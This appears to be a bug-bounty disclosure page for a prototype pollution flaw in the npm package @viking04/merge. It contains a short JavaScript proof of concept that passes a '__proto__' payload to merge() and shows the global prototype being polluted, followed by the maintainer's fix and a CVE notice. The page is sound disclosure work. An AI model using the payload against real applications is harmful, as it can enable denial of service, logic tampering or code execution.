Prototype Pollution in viking04/merge

Valid

Reported on

Sep 8th 2021


✍️ Description

The npm package @viking04/merge is vulnerable to Prototype Pollution. More Details on the Vulnerability: https://medium.com/node-modules/what-is-prototype-pollution-and-why-is-it-such-a-big-deal-2dd8d89a93c

🕵️‍♂️ Proof of Concept

LIVE POC LINK

var merge = require("@viking04/merge")
var a = {"a":{"red":"apple"}}
var b = {"b":{"yellow":"mango"}}
var c = JSON.parse('{"__proto__":{"polluted":true}}')
console.log("Before:"+{}.polluted)
merge(a,b,c)
console.log("After:"+{}.polluted)

Output

"Before:undefined"
"After:true"

💥 Impact

May lead to DOS/Remote Code Execution/Changing Business Logic/Information Disclosure/XSS depending on case.

Occurrences

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
a year ago
viking04
a year ago

Maintainer


Good one, Didn't think of this case ,will need to retest and fix it. Does filtering key with __proto__ and constructorfix this completely ?

viking04 validated this vulnerability a year ago
Jayateertha Guruprasad has been awarded the disclosure bounty
The fix bounty is now up for grabs
viking04 confirmed that a fix has been merged on baba40 a year ago
viking04 has been awarded the fix bounty
Jamie Slome
a year ago

Admin


CVE published! 🎉

to join this conversation